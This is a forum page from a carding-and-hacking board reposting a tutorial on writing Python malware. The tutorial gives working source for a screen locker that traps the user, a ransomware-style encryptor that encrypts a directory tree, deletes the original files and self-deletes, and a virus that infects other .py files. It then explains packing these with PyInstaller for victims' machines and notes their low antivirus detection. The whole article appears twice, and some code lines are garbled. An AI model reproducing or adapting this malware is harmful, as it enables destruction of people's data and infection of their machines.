Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Hacking Tools
Poisonous python. Writing the simplest malware in Python: a locker, ransomware, and a virus
Message
<blockquote data-quote="Plotu" data-source="post: 383" data-attributes="member: 5"><p><img src="https://sun9-23.userapi.com/impg/JV9o1l0QJcsB9tE_Y14AcV3H7jvWt3bCIGM-8A/07CEpKedGBo.jpg?size=807x363&quality=96&sign=28f0ad6baa1e7cb35be98491f4ee6ccd&type=album" alt="07CEpKedGBo.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>The content of the article</strong></p><ul> <li data-xf-list-type="ul">Setting up the environment</li> <li data-xf-list-type="ul">Locker</li> <li data-xf-list-type="ul">Cryptographer</li> <li data-xf-list-type="ul">Virus</li> <li data-xf-list-type="ul">Making an executable file</li> <li data-xf-list-type="ul">Conclusion</li> </ul><p>Why would anyone want to write malware in Python? We'll do this to learn the general principles of malware development, and at the same time you will practice using this language and be able to apply the knowledge gained for other purposes. In addition, Python malware does come across in the wild, and not all antiviruses pay attention to it.</p><p></p><p>Most often, Python is used to create backdoors in software in order to download and execute any code on an infected machine. So, in 2017, employees of the Dr.Web company discovered Python.BackDoor.33, and on May 8, 2019, Mac.BackDoor.Siggen.20 was spotted. Another Trojan, RAT Python, stole user data from infected devices and used Telegram as a data transfer channel.</p><p></p><p>We will create three demo programs: a locker that will block access to the computer until the user enters the correct password, an encryptor that will bypass directories and encrypt all files in them, and a virus that will distribute its code, infecting other programs. in Python.</p><p></p><p><strong>INFO</strong></p><p>The topic of remote administration of infected machines is beyond the scope of this article, but you can get a basic code base with all the explanations in the article " Reverse shell in Python".</p><p></p><p>Despite the fact that our creations do not claim to be of any high technical level, they can be dangerous under certain conditions. Therefore, I warn you that severe punishment may follow for disrupting other people's computers and destroying information. Let's agree right away: you will only run everything that we describe here on your own machine, and even then be careful not to accidentally encrypt the entire disk for yourself.</p><p></p><p></p><p><strong>Setting up the environment</strong></p><p>So, first of all, of course, we need Python itself, and the third version. I will not describe in detail how to install it, but I will immediately send you to download the free book "Python Bite" (PDF). In it you will find the answer to this and many other Python-related questions.</p><p></p><p>Additionally, we will install several modules that we will use:</p><p>Code:</p><p>pip install pyAesCrypt</p><p>pip install pyautogui</p><p>pip install tkinter</p><p>This completes the preparatory stage, you can start writing the code.</p><p></p><p><strong>Locker</strong></p><p>The idea is to create a full screen window and prevent the user from closing it.</p><p></p><p>Importing libraries:</p><p>Code:</p><p>import pyautogui</p><p>from tkinter import Tk, Entry, Label</p><p>from pyautogu coi import click, moveTo</p><p>from time import sleep</p><p>Now let's get down to the main part of the program.</p><p></p><p>Code:</p><p># Create a window</p><p>root = Tk ()</p><p># Cut out the protection of the upper left corner of the screen</p><p>pyautogui.FAILSAFE = False</p><p># Get the width and height of the window</p><p>width = root.winfo_screenwidth ()</p><p>height = root.winfo_screenheight ()</p><p># Set the title of the window</p><p>root.title ('From "Xakep" with love')</p><p># Open the window to full screen</p><p>root.attributes ("- fullscreen", True)</p><p># Create an input field, set its size and location</p><p>entry = Entry (root, font = 1)</p><p>entry.place (width = 150, height = 50, x = width / 2-75, y = height / 2-25)</p><p># Create text labels and set their location</p><p>label0 = Label (root, text = "╚ (• ⌂ •) ╝ Locker by Xakep (╯ ° □ °) ╯︵ ┻━┻", font = 1)</p><p>label0.grid (row = 0, column = 0)</p><p>label1 = Label (root, text = "Write the password and press Ctrl + C", font = 'Arial 20')</p><p>label1.place (x = width / 2-75-130, y = height / 2-25-100)</p><p># Turn on the constant update of the window and pause</p><p>root.update ()</p><p>sleep (0.2)</p><p># Click on the center of the window</p><p>click (width / 2, height / 2)</p><p># reset the key</p><p>k = False</p><p># Now we continuously check if the correct key has been entered</p><p># If entered, call the hooliganism function</p><p>while not k:</p><p> on_closing ()</p><p>Here pyautogui.FAILSAFE = Falseis the protection that is activated when you move the cursor to the upper left corner of the screen. When it is triggered, the program is closed. We do not need this, so we disable this function.</p><p></p><p>To make our locker work on any monitor with any resolution, we read the width and height of the screen and, using a simple formula, calculate where the cursor will go, click, and so on. In our case, the cursor hits the center of the screen, that is, we divide the width and height by two. We will sleepadd a pause ( ) so that the user can enter the code to cancel.</p><p></p><p>Now we have not blocked the input of text, but you can do it, and then the user will not get rid of us in any way. To do this, we will write some more code. I do not advise you to do it right away. First, let's configure the program so that it turns off when you enter a password. But the code for blocking the keyboard and mouse looks like this:</p><p>Code:</p><p>import pythoncom, pyHook</p><p></p><p>hm = pyHook.HookManager ()</p><p>hm.MouseAll = uMad</p><p>hm.KeyAll = uMad</p><p>hm.HookMouse ()</p><p>hm.HookKeyboard ()</p><p>pythoncom.PumpMessages ()</p><p>Let's create a function for entering the key:</p><p>Code:</p><p>def callback (event):</p><p> global k, entry</p><p> if entry.get () == "xakep":</p><p> k = True</p><p>Everything is simple here. If the key is not the one we specified, the program continues to run. If the passwords match, we slow down.</p><p></p><p>The last function that is needed for the pest window to work:</p><p>Code:</p><p>def on_closing ():</p><p> # Click on the center of the screen</p><p> click (width / 2, height / 2)</p><p> # Move the mouse cursor to the center of the screen</p><p> moveTo (width / 2, height / 2)</p><p> # Turn on full screen mode</p><p> root.attributes ("- fullscreen", True)</p><p> # When trying to close the window using the task manager, call on_closing</p><p> root.protocol ("WM_DELETE_WINDOW", on_closing)</p><p> # Enable constant window updates</p><p> root.update ()</p><p> # Add a keyboard shortcut that will close the program</p><p> root.bind ('<Control-KeyPress-c>', callback)</p><p>At this point, our impromptu locker is ready.</p><p></p><p><strong>Cryptographer</strong></p><p>We will write this virus using only one third-party library - pyAesCrypt. The idea is to encrypt all files in the specified directory and all directories below. This is an important limitation to avoid breaking the operating system. For work, we will create two files - an encryptor and a decryptor. After work, the executable files will be self-deleted.</p><p></p><p>First, we request the path to the attacked directory and the password for encryption and decryption:</p><p>Code:</p><p>direct = input ("Write the attacked directory:")</p><p>password = input ("Enter password:")</p><p>Next, we will generate scripts for encryption and decryption. It looks something like this:</p><p>Code:</p><p>with open ("Crypt.py", "w") as crypt:</p><p> crypt.write ('' '</p><p> program text</p><p> '' ')</p><p>Moving on to the files that we will use as templates. Let's start with the encoder. We need two standard libraries:</p><p>Code:</p><p>import os</p><p>import sys</p><p>We write the encryption function (all according to the pyAesCrypt manual):</p><p></p><p>Code:</p><p>def crypt (file):</p><p> import pyAesCrypt</p><p> print ('-' * 80)</p><p> # Set the password and buffer size</p><p> password = "'' '+ str (password) +' ''"</p><p> buffer_size = 512 * 1024</p><p> # Call the encryption function</p><p> pyAesCrypt.encryptFile (str (file), str (file) + ".crp", password, buffer_size)</p><p> print ("[Encrypt] '" + str (file) + ". crp'")</p><p> # Delete the original file</p><p> os.remove (file)</p><p>Instead of str (password), the script generator will insert the password.</p><p></p><p>Important nuances. We will encrypt and decrypt using a buffer, thus we will get rid of the limitation on the file size (at least, we will significantly reduce this limitation). The call is os.remove(file)needed to delete the original file, since we copy the file and encrypt the copy. You can choose to copy the file instead of deleting it.</p><p></p><p>Now a function that bypasses folders. Nothing complicated here either.</p><p></p><p>Code:</p><p>def walk (dir):</p><p> # Loop over all subfolders in the specified folder</p><p> for name in os.listdir (dir):</p><p> path = os.path.join (dir, name)</p><p> # If it's a file, encrypt it</p><p> if os.path.isfile (path):</p><p> crypt (path)</p><p> # If it's a folder, repeat recursively</p><p> else:</p><p> walk (path)</p><p>Let's add two more lines at the end. One for starting a bypass, the second for self-destructing the program.</p><p></p><p>Code:</p><p>walk ("'' '+ str (direct) +' ''")</p><p>os.remove (str (sys.argv [0]))</p><p>The desired path will be substituted here again.</p><p></p><p>Here is the entire source.</p><p></p><p>Code:</p><p>import os</p><p>import sys</p><p></p><p>def crypt (file):</p><p> import pyAesCrypt</p><p> print ('-' * 80)</p><p> password = "'" + str (password) + "'"</p><p> buffer_size = 512 * 1024</p><p> pyAesCrypt.encryptFile (str (file), str (file) + ".crp", password, buffer_size)</p><p> print ("[Encrypt] '" + str (file) + ". crp'")</p><p> os.remove (file)</p><p></p><p>def walk (dir):</p><p> for name in os.listdir (dir):</p><p> path = os.path.join (dir, name)</p><p> if os.path.isfile (path):</p><p> crypt (path)</p><p> else:</p><p> walk (path)</p><p></p><p>walk ("'' '+ str (direct) +' ''")</p><p>print ('-' * 80)</p><p>os.remove (str (sys.argv [0]))</p><p>Now the "mirrored" file. If in the ransomware we wrote encrypt, then in the decryptor we write decrypt. There is no point in repeating the parsing of the same lines, so the final version is right away.</p><p></p><p>Code:</p><p>import os</p><p>import sys</p><p></p><p># Decryption function</p><p>def decrypt (file):</p><p> import pyAesCrypt</p><p> print ('-' * 80)</p><p> password = "'' '+ str (password) +' ''"</p><p> buffer_size = 512 * 1024</p><p> pyAesCrypt.decryptFile (str (file), str (os.path.splitext (file) [0]), password, buffer_size)</p><p> print ("[Decrypt] '" + str (os.path.splitext (file) [0]) + "'")</p><p> os.remove (file)</p><p></p><p># Directory traversal</p><p>def walk (dir):</p><p> for name in os.listdir (dir):</p><p> path = os.path.join (dir, name)</p><p> if os.path.isfile (path):</p><p> try:</p><p> decrypt (path)</p><p> except Error:</p><p> pass</p><p> else:</p><p> walk (path)</p><p></p><p>walk ("'' '+ str (direct) +' ''")</p><p>print ('-' * 80)</p><p>os.remove (str (sys.argv [0]))</p><p>A total of 29 lines, of which it took three to decipher. In case one of the files suddenly turns out to be damaged and an error occurs, we use the exception catch ( try...except). That is, if we fail to decrypt the file, we just skip it.</p><p></p><p><strong>Virus</strong></p><p>The idea here is to create a program that will infect other programs with the specified extension. Unlike real viruses that infect any executable file, ours will only infect other Python programs.</p><p></p><p>This time we don't need any third-party libraries, we only need the sys and os modules. We connect them.</p><p>Code:</p><p>import sys</p><p>import os</p><p>Let's create three functions: message, parser, infection.</p><p></p><p>The function that reports the attack:</p><p>Code:</p><p>def code (void):</p><p> print ("Infected")</p><p>Let's call it right away to understand that the program has worked:</p><p>Code:</p><p>code (None)</p><p>Directory traversal is similar to what we did in the ransomware.</p><p></p><p>Code:</p><p>def walk (dir):</p><p> for name in os.listdir (dir):</p><p> path = os.path.join (dir, name)</p><p> # If you find a file, check its extension</p><p> if os.path.isfile (path):</p><p> # If the extension is py, call virus</p><p> if (os.path.splitext (path) [1] == ".py"):</p><p> virus (path)</p><p> else:</p><p> pass</p><p> else:</p><p> # If it's a directory, go to it</p><p> walk (path)</p><p></p><p>The virus will infect files "down" from the directory where it is located (we get the path by calling os.getcwd()).</p><p></p><p>At the beginning and at the end of the file, we write the following comments:</p><p>Code:</p><p># START #</p><p># STOP #</p><p>I'll explain why a little later.</p><p></p><p>Next is the function that is responsible for self-replication.</p><p></p><p>Code:</p><p>def virus (python):</p><p> begin = "# START # \ n"</p><p> end = "# STOP # \ n"</p><p> # Read the attacked file, let's call it copy</p><p> with open (sys.argv [0], "r") as copy:</p><p> # Create a flag</p><p> k = 0</p><p> # Create a variable for the virus code and add an empty line</p><p> virus_code = "\ n"</p><p> # We go through the infected file line by line</p><p> for line in copy:</p><p> # If we find a start marker, raise the flag</p><p> if line == begin:</p><p> k = 1</p><p> # Add a marker to the infected code</p><p> virus_code + = begin</p><p> # If we go through the beginning, but do not reach the end, copy the line</p><p> elif k == 1 and line! = end:</p><p> virus_code + = line</p><p> # If we have reached the end, add the final marker and exit the loop</p><p> elif line == end:</p><p> virus_code + = end</p><p> break</p><p> else:</p><p> pass</p><p> # Read the infected file again</p><p> with open (python, "r") as file:</p><p> # Create a variable for the source code</p><p> original_code = ""</p><p> # Copy the infected code line by line</p><p> for line in file:</p><p> original_code + = line</p><p> # If we find a marker of the beginning of the virus, stop and raise the vir flag</p><p> if line == begin:</p><p> vir = True</p><p> break</p><p> # If there is no marker, omit the vir flag</p><p> else:</p><p> vir = False</p><p> # If vir is omitted, write virus and source code to file</p><p> if not vir:</p><p> with open (python, "w") as paste:</p><p> paste.write (virus_code + "\ n \ n" + original_code)</p><p> else:</p><p> pass</p><p>Now, I think, it has become clearer why we need “start” and “stop” labels. They mark the beginning and end of the virus code. First, we read the file and go through it line by line. When we come across the starting mark, we raise the flag. Add an empty line so that the virus in the source code starts on a new line. We read the file a second time and write the source code line by line. The last step is to write a virus, two indents and the original code. You can make fun of it and write it in some special way - for example, modify all output lines.</p><p></p><p><strong>Making an executable file</strong></p><p>How to run a virus written in a scripting language on a victim's machine? There are two ways: either to somehow make sure that the interpreter is installed there, or to pack our creation along with everything you need into a single executable file. The PyInstaller utility serves this purpose. Here's how to use it.</p><p></p><p>Install</p><p>Code:</p><p>pip install PyInstaller</p><p>And we enter the command</p><p>Code:</p><p>PyInstaller "filename.py" --onefile --noconsole</p><p>We wait a bit, and a bunch of files appear in the program folder. You can safely get rid of everything except executables, they will be in the dist folder.</p><p></p><p>It is said that ever since malware in Python began to appear, antiviruses have become extremely nervous about PyInstaller, even if it comes with a perfectly safe program.</p><p></p><p>I decided to check what VirusTotal has to say about my creations. Here are the reports:</p><ul> <li data-xf-list-type="ul">12 out of 72 antiviruses did not like the Crypt.exe file;</li> <li data-xf-list-type="ul">Locker.exe file - 10 out of 72 antiviruses;</li> <li data-xf-list-type="ul">file Virus.exe - 23 out of 72 antiviruses.</li> </ul><p>The worst result was shown by Virus.exe - either some antiviruses paid attention to self-replication, or they just didn't like the name of the file. But as you can see, the contents of any of these files have not alerted all antiviruses.</p><p></p><p><strong>Conclusion</strong></p><p>So, we wrote three malicious programs using a scripting language and packaged them using PyInstaller.</p><p></p><p>Of course, our virus is not the scariest one in the world, and the locker and ransomware still need to somehow be delivered to the victim's car. At the same time, none of our programs communicate with the C & C server and I have not obfuscated the code at all, so there is still a huge scope for creativity.</p><p></p><p>Nevertheless, the level of detection by antiviruses turned out to be surprisingly low. It turns out that even the simplest self-written malware can become a threat. So antiviruses are antiviruses, but it will always be unsafe to download random programs from the Internet and run them without thinking.</p></blockquote><p></p>
[QUOTE="Plotu, post: 383, member: 5"] [IMG alt="07CEpKedGBo.jpg"]https://sun9-23.userapi.com/impg/JV9o1l0QJcsB9tE_Y14AcV3H7jvWt3bCIGM-8A/07CEpKedGBo.jpg?size=807x363&quality=96&sign=28f0ad6baa1e7cb35be98491f4ee6ccd&type=album[/IMG] [B]The content of the article[/B] [LIST] [*]Setting up the environment [*]Locker [*]Cryptographer [*]Virus [*]Making an executable file [*]Conclusion [/LIST] Why would anyone want to write malware in Python? We'll do this to learn the general principles of malware development, and at the same time you will practice using this language and be able to apply the knowledge gained for other purposes. In addition, Python malware does come across in the wild, and not all antiviruses pay attention to it. Most often, Python is used to create backdoors in software in order to download and execute any code on an infected machine. So, in 2017, employees of the Dr.Web company discovered Python.BackDoor.33, and on May 8, 2019, Mac.BackDoor.Siggen.20 was spotted. Another Trojan, RAT Python, stole user data from infected devices and used Telegram as a data transfer channel. We will create three demo programs: a locker that will block access to the computer until the user enters the correct password, an encryptor that will bypass directories and encrypt all files in them, and a virus that will distribute its code, infecting other programs. in Python. [B]INFO[/B] The topic of remote administration of infected machines is beyond the scope of this article, but you can get a basic code base with all the explanations in the article " Reverse shell in Python". Despite the fact that our creations do not claim to be of any high technical level, they can be dangerous under certain conditions. Therefore, I warn you that severe punishment may follow for disrupting other people's computers and destroying information. Let's agree right away: you will only run everything that we describe here on your own machine, and even then be careful not to accidentally encrypt the entire disk for yourself. [B]Setting up the environment[/B] So, first of all, of course, we need Python itself, and the third version. I will not describe in detail how to install it, but I will immediately send you to download the free book "Python Bite" (PDF). In it you will find the answer to this and many other Python-related questions. Additionally, we will install several modules that we will use: Code: pip install pyAesCrypt pip install pyautogui pip install tkinter This completes the preparatory stage, you can start writing the code. [B]Locker[/B] The idea is to create a full screen window and prevent the user from closing it. Importing libraries: Code: import pyautogui from tkinter import Tk, Entry, Label from pyautogu coi import click, moveTo from time import sleep Now let's get down to the main part of the program. Code: # Create a window root = Tk () # Cut out the protection of the upper left corner of the screen pyautogui.FAILSAFE = False # Get the width and height of the window width = root.winfo_screenwidth () height = root.winfo_screenheight () # Set the title of the window root.title ('From "Xakep" with love') # Open the window to full screen root.attributes ("- fullscreen", True) # Create an input field, set its size and location entry = Entry (root, font = 1) entry.place (width = 150, height = 50, x = width / 2-75, y = height / 2-25) # Create text labels and set their location label0 = Label (root, text = "╚ (• ⌂ •) ╝ Locker by Xakep (╯ ° □ °) ╯︵ ┻━┻", font = 1) label0.grid (row = 0, column = 0) label1 = Label (root, text = "Write the password and press Ctrl + C", font = 'Arial 20') label1.place (x = width / 2-75-130, y = height / 2-25-100) # Turn on the constant update of the window and pause root.update () sleep (0.2) # Click on the center of the window click (width / 2, height / 2) # reset the key k = False # Now we continuously check if the correct key has been entered # If entered, call the hooliganism function while not k: on_closing () Here pyautogui.FAILSAFE = Falseis the protection that is activated when you move the cursor to the upper left corner of the screen. When it is triggered, the program is closed. We do not need this, so we disable this function. To make our locker work on any monitor with any resolution, we read the width and height of the screen and, using a simple formula, calculate where the cursor will go, click, and so on. In our case, the cursor hits the center of the screen, that is, we divide the width and height by two. We will sleepadd a pause ( ) so that the user can enter the code to cancel. Now we have not blocked the input of text, but you can do it, and then the user will not get rid of us in any way. To do this, we will write some more code. I do not advise you to do it right away. First, let's configure the program so that it turns off when you enter a password. But the code for blocking the keyboard and mouse looks like this: Code: import pythoncom, pyHook hm = pyHook.HookManager () hm.MouseAll = uMad hm.KeyAll = uMad hm.HookMouse () hm.HookKeyboard () pythoncom.PumpMessages () Let's create a function for entering the key: Code: def callback (event): global k, entry if entry.get () == "xakep": k = True Everything is simple here. If the key is not the one we specified, the program continues to run. If the passwords match, we slow down. The last function that is needed for the pest window to work: Code: def on_closing (): # Click on the center of the screen click (width / 2, height / 2) # Move the mouse cursor to the center of the screen moveTo (width / 2, height / 2) # Turn on full screen mode root.attributes ("- fullscreen", True) # When trying to close the window using the task manager, call on_closing root.protocol ("WM_DELETE_WINDOW", on_closing) # Enable constant window updates root.update () # Add a keyboard shortcut that will close the program root.bind ('<Control-KeyPress-c>', callback) At this point, our impromptu locker is ready. [B]Cryptographer[/B] We will write this virus using only one third-party library - pyAesCrypt. The idea is to encrypt all files in the specified directory and all directories below. This is an important limitation to avoid breaking the operating system. For work, we will create two files - an encryptor and a decryptor. After work, the executable files will be self-deleted. First, we request the path to the attacked directory and the password for encryption and decryption: Code: direct = input ("Write the attacked directory:") password = input ("Enter password:") Next, we will generate scripts for encryption and decryption. It looks something like this: Code: with open ("Crypt.py", "w") as crypt: crypt.write ('' ' program text '' ') Moving on to the files that we will use as templates. Let's start with the encoder. We need two standard libraries: Code: import os import sys We write the encryption function (all according to the pyAesCrypt manual): Code: def crypt (file): import pyAesCrypt print ('-' * 80) # Set the password and buffer size password = "'' '+ str (password) +' ''" buffer_size = 512 * 1024 # Call the encryption function pyAesCrypt.encryptFile (str (file), str (file) + ".crp", password, buffer_size) print ("[Encrypt] '" + str (file) + ". crp'") # Delete the original file os.remove (file) Instead of str (password), the script generator will insert the password. Important nuances. We will encrypt and decrypt using a buffer, thus we will get rid of the limitation on the file size (at least, we will significantly reduce this limitation). The call is os.remove(file)needed to delete the original file, since we copy the file and encrypt the copy. You can choose to copy the file instead of deleting it. Now a function that bypasses folders. Nothing complicated here either. Code: def walk (dir): # Loop over all subfolders in the specified folder for name in os.listdir (dir): path = os.path.join (dir, name) # If it's a file, encrypt it if os.path.isfile (path): crypt (path) # If it's a folder, repeat recursively else: walk (path) Let's add two more lines at the end. One for starting a bypass, the second for self-destructing the program. Code: walk ("'' '+ str (direct) +' ''") os.remove (str (sys.argv [0])) The desired path will be substituted here again. Here is the entire source. Code: import os import sys def crypt (file): import pyAesCrypt print ('-' * 80) password = "'" + str (password) + "'" buffer_size = 512 * 1024 pyAesCrypt.encryptFile (str (file), str (file) + ".crp", password, buffer_size) print ("[Encrypt] '" + str (file) + ". crp'") os.remove (file) def walk (dir): for name in os.listdir (dir): path = os.path.join (dir, name) if os.path.isfile (path): crypt (path) else: walk (path) walk ("'' '+ str (direct) +' ''") print ('-' * 80) os.remove (str (sys.argv [0])) Now the "mirrored" file. If in the ransomware we wrote encrypt, then in the decryptor we write decrypt. There is no point in repeating the parsing of the same lines, so the final version is right away. Code: import os import sys # Decryption function def decrypt (file): import pyAesCrypt print ('-' * 80) password = "'' '+ str (password) +' ''" buffer_size = 512 * 1024 pyAesCrypt.decryptFile (str (file), str (os.path.splitext (file) [0]), password, buffer_size) print ("[Decrypt] '" + str (os.path.splitext (file) [0]) + "'") os.remove (file) # Directory traversal def walk (dir): for name in os.listdir (dir): path = os.path.join (dir, name) if os.path.isfile (path): try: decrypt (path) except Error: pass else: walk (path) walk ("'' '+ str (direct) +' ''") print ('-' * 80) os.remove (str (sys.argv [0])) A total of 29 lines, of which it took three to decipher. In case one of the files suddenly turns out to be damaged and an error occurs, we use the exception catch ( try...except). That is, if we fail to decrypt the file, we just skip it. [B]Virus[/B] The idea here is to create a program that will infect other programs with the specified extension. Unlike real viruses that infect any executable file, ours will only infect other Python programs. This time we don't need any third-party libraries, we only need the sys and os modules. We connect them. Code: import sys import os Let's create three functions: message, parser, infection. The function that reports the attack: Code: def code (void): print ("Infected") Let's call it right away to understand that the program has worked: Code: code (None) Directory traversal is similar to what we did in the ransomware. Code: def walk (dir): for name in os.listdir (dir): path = os.path.join (dir, name) # If you find a file, check its extension if os.path.isfile (path): # If the extension is py, call virus if (os.path.splitext (path) [1] == ".py"): virus (path) else: pass else: # If it's a directory, go to it walk (path) The virus will infect files "down" from the directory where it is located (we get the path by calling os.getcwd()). At the beginning and at the end of the file, we write the following comments: Code: # START # # STOP # I'll explain why a little later. Next is the function that is responsible for self-replication. Code: def virus (python): begin = "# START # \ n" end = "# STOP # \ n" # Read the attacked file, let's call it copy with open (sys.argv [0], "r") as copy: # Create a flag k = 0 # Create a variable for the virus code and add an empty line virus_code = "\ n" # We go through the infected file line by line for line in copy: # If we find a start marker, raise the flag if line == begin: k = 1 # Add a marker to the infected code virus_code + = begin # If we go through the beginning, but do not reach the end, copy the line elif k == 1 and line! = end: virus_code + = line # If we have reached the end, add the final marker and exit the loop elif line == end: virus_code + = end break else: pass # Read the infected file again with open (python, "r") as file: # Create a variable for the source code original_code = "" # Copy the infected code line by line for line in file: original_code + = line # If we find a marker of the beginning of the virus, stop and raise the vir flag if line == begin: vir = True break # If there is no marker, omit the vir flag else: vir = False # If vir is omitted, write virus and source code to file if not vir: with open (python, "w") as paste: paste.write (virus_code + "\ n \ n" + original_code) else: pass Now, I think, it has become clearer why we need “start” and “stop” labels. They mark the beginning and end of the virus code. First, we read the file and go through it line by line. When we come across the starting mark, we raise the flag. Add an empty line so that the virus in the source code starts on a new line. We read the file a second time and write the source code line by line. The last step is to write a virus, two indents and the original code. You can make fun of it and write it in some special way - for example, modify all output lines. [B]Making an executable file[/B] How to run a virus written in a scripting language on a victim's machine? There are two ways: either to somehow make sure that the interpreter is installed there, or to pack our creation along with everything you need into a single executable file. The PyInstaller utility serves this purpose. Here's how to use it. Install Code: pip install PyInstaller And we enter the command Code: PyInstaller "filename.py" --onefile --noconsole We wait a bit, and a bunch of files appear in the program folder. You can safely get rid of everything except executables, they will be in the dist folder. It is said that ever since malware in Python began to appear, antiviruses have become extremely nervous about PyInstaller, even if it comes with a perfectly safe program. I decided to check what VirusTotal has to say about my creations. Here are the reports: [LIST] [*]12 out of 72 antiviruses did not like the Crypt.exe file; [*]Locker.exe file - 10 out of 72 antiviruses; [*]file Virus.exe - 23 out of 72 antiviruses. [/LIST] The worst result was shown by Virus.exe - either some antiviruses paid attention to self-replication, or they just didn't like the name of the file. But as you can see, the contents of any of these files have not alerted all antiviruses. [B]Conclusion[/B] So, we wrote three malicious programs using a scripting language and packaged them using PyInstaller. Of course, our virus is not the scariest one in the world, and the locker and ransomware still need to somehow be delivered to the victim's car. At the same time, none of our programs communicate with the C & C server and I have not obfuscated the code at all, so there is still a huge scope for creativity. Nevertheless, the level of detection by antiviruses turned out to be surprisingly low. It turns out that even the simplest self-written malware can become a threat. So antiviruses are antiviruses, but it will always be unsafe to download random programs from the Internet and run them without thinking. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Hacking Tools
Poisonous python. Writing the simplest malware in Python: a locker, ransomware, and a virus
Top